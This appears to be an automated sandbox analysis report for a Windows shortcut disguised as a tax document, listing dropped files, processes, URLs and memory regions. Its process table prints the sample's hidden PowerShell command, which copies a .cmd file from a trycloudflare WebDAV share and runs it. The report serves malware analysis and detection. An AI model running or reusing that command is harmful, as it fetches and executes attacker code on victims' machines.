Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
tax-docs-2023.download.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working
directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Mar 14 09:29:06 2024, mtime=Thu Mar 14 09:29:06 2024,
atime=Thu Mar 14 09:29:06 2024, length=450560, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3ffpg2o.qq2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkqrkhp1.pc1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UF8KRGFCLU4T1S69RS2P.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\mixer-brake-tan-cleaner.trycloudflare.com@SSL\DavWWWRoot\bas.cmd'
\"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.cmd\" -WindowStyle Hidden"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 3 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21E5773F000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E120000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
EF824BA000
|
stack
|
page read and write
|
||
|
7FFE7DEB6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DEB0000
|
trusted library allocation
|
page read and write
|
||
|
21E47720000
|
heap
|
page execute and read and write
|
||
|
21E47580000
|
trusted library allocation
|
page read and write
|
||
|
21E48F8D000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE10000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DFB1000
|
trusted library allocation
|
page read and write
|
||
|
21E5FA1C000
|
heap
|
page read and write
|
||
|
7FFE7DFE2000
|
trusted library allocation
|
page read and write
|
||
|
21E457BA000
|
heap
|
page read and write
|
||
|
7FFE7E0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE1B000
|
trusted library allocation
|
page read and write
|
||
|
21E45717000
|
heap
|
page read and write
|
||
|
7FFE7E070000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE03000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E47731000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DFF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E457E0000
|
heap
|
page read and write
|
||
|
21E456E0000
|
heap
|
page read and write
|
||
|
7FFE7DFC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E140000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E150000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E090000
|
trusted library allocation
|
page read and write
|
||
|
21E47962000
|
trusted library allocation
|
page read and write
|
||
|
21E5F7F7000
|
heap
|
page execute and read and write
|
||
|
21E4577C000
|
heap
|
page read and write
|
||
|
21E5F800000
|
heap
|
page read and write
|
||
|
21E5F81F000
|
heap
|
page read and write
|
||
|
7FFE7E130000
|
trusted library allocation
|
page read and write
|
||
|
21E5FA42000
|
heap
|
page read and write
|
||
|
EF822FD000
|
stack
|
page read and write
|
||
|
21E4935C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E0F0000
|
trusted library allocation
|
page read and write
|
||
|
21E45870000
|
heap
|
page read and write
|
||
|
7FFE7E020000
|
trusted library allocation
|
page read and write
|
||
|
21E477BA000
|
trusted library allocation
|
page read and write
|
||
|
21E47170000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E0B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE04000
|
trusted library allocation
|
page read and write
|
||
|
21E456E9000
|
heap
|
page read and write
|
||
|
EF827BB000
|
stack
|
page read and write
|
||
|
21E47140000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E0E0000
|
trusted library allocation
|
page read and write
|
||
|
EF825BE000
|
stack
|
page read and write
|
||
|
21E45590000
|
heap
|
page read and write
|
||
|
EF81D4D000
|
stack
|
page read and write
|
||
|
21E5F900000
|
heap
|
page read and write
|
||
|
7FFE7E050000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E010000
|
trusted library allocation
|
page read and write
|
||
|
21E5F8E0000
|
heap
|
page read and write
|
||
|
EF8318F000
|
stack
|
page read and write
|
||
|
7FFE7E100000
|
trusted library allocation
|
page read and write
|
||
|
21E457C0000
|
heap
|
page read and write
|
||
|
21E475E3000
|
heap
|
page read and write
|
||
|
7FFE7E040000
|
trusted library allocation
|
page read and write
|
||
|
21E5F825000
|
heap
|
page read and write
|
||
|
21E48FB9000
|
trusted library allocation
|
page read and write
|
||
|
21E47200000
|
heap
|
page read and write
|
||
|
7FFE7DFBA000
|
trusted library allocation
|
page read and write
|
||
|
21E45690000
|
heap
|
page read and write
|
||
|
21E47180000
|
heap
|
page readonly
|
||
|
21E4577A000
|
heap
|
page read and write
|
||
|
21E5F8BA000
|
heap
|
page read and write
|
||
|
7FFE7E0D0000
|
trusted library allocation
|
page read and write
|
||
|
21E45792000
|
heap
|
page read and write
|
||
|
21E488B1000
|
trusted library allocation
|
page read and write
|
||
|
21E49014000
|
trusted library allocation
|
page read and write
|
||
|
21E48F6C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E030000
|
trusted library allocation
|
page read and write
|
||
|
EF8207D000
|
stack
|
page read and write
|
||
|
21E471C0000
|
heap
|
page read and write
|
||
|
21E5F848000
|
heap
|
page read and write
|
||
|
EF8217B000
|
stack
|
page read and write
|
||
|
21E5F7F0000
|
heap
|
page execute and read and write
|
||
|
EF82437000
|
stack
|
page read and write
|
||
|
21E5F87E000
|
heap
|
page read and write
|
||
|
7FFE7DEBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E48362000
|
trusted library allocation
|
page read and write
|
||
|
EF8273E000
|
stack
|
page read and write
|
||
|
21E476F0000
|
heap
|
page execute and read and write
|
||
|
7FFE7DF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF49EC00000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E457BC000
|
heap
|
page read and write
|
||
|
7FFE7DFD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
EF82539000
|
stack
|
page read and write
|
||
|
7FFE7DEE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7E110000
|
trusted library allocation
|
page read and write
|
||
|
EF8227E000
|
stack
|
page read and write
|
||
|
21E48D03000
|
trusted library allocation
|
page read and write
|
||
|
21E49360000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE20000
|
trusted library allocation
|
page read and write
|
||
|
21E48F6E000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DEC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E45780000
|
heap
|
page read and write
|
||
|
EF8237A000
|
stack
|
page read and write
|
||
|
EF821FF000
|
stack
|
page read and write
|
||
|
7FFE7E060000
|
trusted library allocation
|
page read and write
|
||
|
21E47205000
|
heap
|
page read and write
|
||
|
21E47583000
|
trusted library allocation
|
page read and write
|
||
|
EF81DCE000
|
stack
|
page read and write
|
||
|
21E5FA00000
|
heap
|
page read and write
|
||
|
EF823BF000
|
stack
|
page read and write
|
||
|
21E45772000
|
heap
|
page read and write
|
||
|
21E57731000
|
trusted library allocation
|
page read and write
|
||
|
21E5FA8A000
|
heap
|
page read and write
|
||
|
21E475D0000
|
heap
|
page read and write
|
||
|
21E577A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E000000
|
trusted library allocation
|
page read and write
|
||
|
21E5FA0C000
|
heap
|
page read and write
|
||
|
7FFE7E0C0000
|
trusted library allocation
|
page read and write
|
||
|
EF8263F000
|
stack
|
page read and write
|
||
|
EF820FE000
|
stack
|
page read and write
|
||
|
EF81CC5000
|
stack
|
page read and write
|
||
|
7FFE7DFA0000
|
trusted library allocation
|
page read and write
|
||
|
21E5F920000
|
heap
|
page read and write
|
||
|
21E49102000
|
trusted library allocation
|
page read and write
|
||
|
21E5FA4B000
|
heap
|
page read and write
|
||
|
21E45875000
|
heap
|
page read and write
|
||
|
21E47190000
|
trusted library allocation
|
page read and write
|
||
|
21E578E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE02000
|
trusted library allocation
|
page read and write
|
||
|
21E456F3000
|
heap
|
page read and write
|
||
|
7FFE7E080000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7DE5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E45670000
|
heap
|
page read and write
|
||
|
21E49297000
|
trusted library allocation
|
page read and write
|
There are 120 hidden memdumps, click here to show them.